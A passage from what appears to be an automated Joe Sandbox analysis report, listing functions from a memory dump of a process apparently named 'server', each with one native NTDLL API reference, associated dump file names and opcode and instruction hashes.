Opcode Fuzzy Hash: 9d888eb0dacabc403f276da66f7c87685d0d36e23215ca0c6e3458eb872e6301
Instruction Fuzzy Hash: D59002E0D10100AEAD0497E09D0DC37752CE5C078131045487002C2010A5655805C630

Function 00A1970C Relevance: 1.5, APIs: 1, Instructions: 5nativeCOMMON

Download Yara Rule

APIs

NtOpenSection.NTDLL ref: 00A1970F

Memory Dump Source

Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9a0000_server.jbxd

Similarity

API ID: OpenSection
String ID:
API String ID: 1950954290-0
Opcode ID: 783fd4892fd18f064b4694e914461d1484d2bfb0b84a936dc55f194faa35e01d
Instruction ID: 15ee953fb5d8a969495a51deaabceed93fa42db23d647f8d4d3bdd112d04972d
Opcode Fuzzy Hash: 783fd4892fd18f064b4694e914461d1484d2bfb0b84a936dc55f194faa35e01d
Instruction Fuzzy Hash: 979002E0810241AEAE4497E29D0DD37272CD7C0F053044688B001C641096646841C530

Function 00A191A3 Relevance: 1.5, APIs: 1, Instructions: 4filenativeCOMMON

Download Yara Rule

APIs

NtFlushBuffersFile.NTDLL ref: 00A191A5

Memory Dump Source

Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9a0000_server.jbxd

Similarity

API ID: BuffersFileFlush
String ID:
API String ID: 1685522069-0
Opcode ID: ca0260608e9759b8636b1f165a85ee94743b961b40d496f71f1b24735678e82f
Instruction ID: 8b93b7f03f0bb275c67c49d3759e63a5ed5bf0eee84429e516505d66ecb2b6fe
Opcode Fuzzy Hash: ca0260608e9759b8636b1f165a85ee94743b961b40d496f71f1b24735678e82f
Instruction Fuzzy Hash:

Function 00A191BF Relevance: 1.5, APIs: 1, Instructions: 4nativeCOMMON

Download Yara Rule

APIs

NtExtendSection.NTDLL ref: 00A191C1

Memory Dump Source

Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9a0000_server.jbxd

Similarity

API ID: ExtendSection
String ID:
API String ID: 1258755343-0
Opcode ID: 92575d7bca8d7bcd0830f3e30ea783a3d814ff7edd9f6180f60ff1ae0a38fef6
Instruction ID: 5d0da67df594d1aed39d990a317dcc16e967d709a17b4ab69461b296b9fdd6d3
Opcode Fuzzy Hash: 92575d7bca8d7bcd0830f3e30ea783a3d814ff7edd9f6180f60ff1ae0a38fef6
Instruction Fuzzy Hash:

Function 00A19873 Relevance: 1.5, APIs: 1, Instructions: 4nativeCOMMON

Download Yara Rule

APIs

NtUnmapViewOfSection.NTDLL ref: 00A19875

Memory Dump Source

Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9a0000_server.jbxd

Similarity

API ID: SectionUnmapView
String ID:
API String ID: 498011366-0
Opcode ID: 74288e299c5010e40e28da4cb24b4c02585bf6df3335bd9643bf3ecea45c8992
Instruction ID: d581a8454040183f7f55198957a7bfb7e83efe9971c33f2fc2e198d82391f5ce
Opcode Fuzzy Hash: 74288e299c5010e40e28da4cb24b4c02585bf6df3335bd9643bf3ecea45c8992
Instruction Fuzzy Hash:

Function 00A19857 Relevance: 1.5, APIs: 1, Instructions: 4filenativeCOMMON

Download Yara Rule

APIs

NtQueryFullAttributesFile.NTDLL ref: 00A19859

Memory Dump Source

Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9a0000_server.jbxd

Similarity

API ID: AttributesFileFullQuery
String ID:
API String ID: 3545844373-0
Opcode ID: 7d753ee8524bfca4f5d9a0cc9fa71f8d63075e4a52d012b04afee10b99f93baf
Instruction ID: da99e4079478525216236fa421d741c8dbad004e690a977a96e5f18b0c44606e
Opcode Fuzzy Hash: 7d753ee8524bfca4f5d9a0cc9fa71f8d63075e4a52d012b04afee10b99f93baf
Instruction Fuzzy Hash:

Function 00A19AEF Relevance: 1.5, APIs: 1, Instructions: 4filenativeCOMMON

Download Yara Rule

APIs

NtQueryAttributesFile.NTDLL ref: 00A19AF1

Memory Dump Source

Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9a0000_server.jbxd

Similarity

API ID: AttributesFileQuery
String ID:
API String ID: 2106648053-0
Opcode ID: 066b00b3ac7e481219bb415d0a632d23e9e0072cd759e8aee3954d1cedc81b11
Instruction ID: c1faec2b6f52836e104efb1f9d30d351b4cb4546ad141da8b401184068f69d30
Opcode Fuzzy Hash: 066b00b3ac7e481219bb415d0a632d23e9e0072cd759e8aee3954d1cedc81b11
Instruction Fuzzy Hash:

Function 00A18F0B Relevance: 1.5, APIs: 1, Instructions: 4nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL ref: 00A18F0D

Memory Dump Source

Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9a0000_server.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 49e637a8ce2f5cebf1ea3708752a456c8bcc4e3a4a518977d2305f24d8c1739a
Instruction ID: 6d7bc9c68617bec70b9af704d6226d2360df82c5cd423961a9038629d972c08e
Opcode Fuzzy Hash: 49e637a8ce2f5cebf1ea3708752a456c8bcc4e3a4a518977d2305f24d8c1739a
Instruction Fuzzy Hash:

Function 00A193FE Relevance: 1.5, APIs: 1, Instructions: 3nativeCOMMON

Download Yara Rule

APIs

NtFlushKey.NTDLL ref: 00A193FF

Memory Dump Source

Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9a0000_server.jbxd

Similarity

API ID: Flush
String ID:
API String ID: 1965063083-0
Opcode ID: d6cf66d29351391273243f6eed5ffcd9b8ba66cd254d312e44cd782d62cd5c97
Instruction ID: 94b25eb200da5c0f391715b1791fc267f6021844131c91616eac276e33bb4d60
Opcode Fuzzy Hash: d6cf66d29351391273243f6eed5ffcd9b8ba66cd254d312e44cd782d62cd5c97
Instruction Fuzzy Hash:

Function 00A193C6 Relevance: 1.5, APIs: 1, Instructions: 3nativeCOMMON

Download Yara Rule

APIs

NtDeleteKey.NTDLL ref: 00A193C7

Memory Dump Source

Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9a0000_server.jbxd

Similarity

API ID: Delete
String ID:
API String ID: 1035893169-0
Opcode ID: d0e3e746eda1377066b230e3229f49fdeb22a117cb88364e8e1f0ac82eb82cac
Instruction ID: ea52197baf1749cfb3da05e3b50c9413d8e5908b5c823d48f536d1502a6f1649
Opcode Fuzzy Hash: d0e3e746eda1377066b230e3229f49fdeb22a117cb88364e8e1f0ac82eb82cac
Instruction Fuzzy Hash:

Function 00A1957E Relevance: 1.5, APIs: 1, Instructions: 3nativeCOMMON

Download Yara Rule

APIs

NtUnloadKey.NTDLL ref: 00A1957F

Memory Dump Source

